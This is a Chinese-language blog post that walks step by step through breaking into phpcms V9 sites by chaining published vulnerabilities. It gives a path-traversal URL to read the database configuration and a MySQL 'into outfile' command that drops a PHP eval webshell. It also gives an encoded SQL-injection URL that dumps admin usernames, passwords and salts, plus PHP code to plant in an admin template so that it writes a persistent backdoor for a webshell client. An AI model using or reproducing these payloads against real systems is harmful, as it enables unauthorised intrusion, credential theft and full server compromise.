phpcms V9 漏洞 综合利用篇

phpcms 一个大公司 做了这么多年，没想到做出的产品漏洞还是这么多,估计是你得罪大黑牛了,天天爆你的洞.
回归正题，昨天想用phpcms搭建个站点,上网一查,乖乖不得了,最新版的 phpcms V9 漏洞这么多,根据网上已经爆出的漏洞,想了几个方案综合利用.

感谢爆洞的大牛们.
第一个方案 phpcms V9 有个任意读取文件漏洞 先爆出phpcms文件配置  读取 database.php 数据库配置文件

http://www.saoyu.com/index.php?m=search&c=index&a=public_get_suggest_keyword&url=asdf&q=../../phpsso_server/caches/configs/database.php

拿到数据库用户名 密码后 要看运气 如果直接是root用户 并且mysql可以外链 那么恭喜你,可以通过数据库导出webshell  先报出网站的路径

http://www.saoyu.com/phpsso_server/phpcms/libs/classes/model.class.php

然后连接mysql 执行 mysql 命令 导出一句话

Select '<?php eval($_POST[cmd]);?>' into outfile 'd:/webpath/cmd.php';

注意标点 和大小写，最后上菜刀.

第二个方案 直接爆管理员用户密码

先注册 用户 然后访问api文件爆出phpcms V9的表前缀

http://www.saoyu.com/api.php?op=add_favorite&url=wooyun.in&title=%2527

根据表前缀在爆出 phpcms V9的用户名和密码

http://www.saoyu.com/api.php?op=add_favorite&url=v9&title=%2527%2520and%2520%2528select%25201%2520from%2528select%2520count%2528%252a%2529%252Cconcat%2528%2528select%2520%2528select%2520%2528select%2520concat%25280x23%252Ccast%2528concat%2528username%252C0x3a%252Cpassword%252C0x3a%252Cencrypt%2529%2520as%2520char%2529%252C0x23%2529%2520from%2520v9_admin%2520LIMIT%25200%252C1%2529%2529%2520from%2520information_schema.tables%2520limit%25200%252C1%2529%252Cfloor%2528rand%25280%2529%252a2%2529%2529x%2520from%2520information_schema.tables%2520group%2520by%2520x%2529a%2529%2520and%2520%25271%2527%253D%25271

截两个图过来大家看得更清楚

phpcms 密码加密方式和discuz是一样的  md5(md5($pass).$salt)

进入后台 点击界面–模版风格–随便找个页面点击修改 加入

<?
$fp = @fopen("0day.php", 'a');
@fwrite($fp, '<'.'?php'."\r\n\r\n".'eval($_POST[0day])'."\r\n\r\n?".">\r\n");
@fclose($fp);
?>

然后点击可视化 就生成了0day.php 菜刀连接 密码 cmd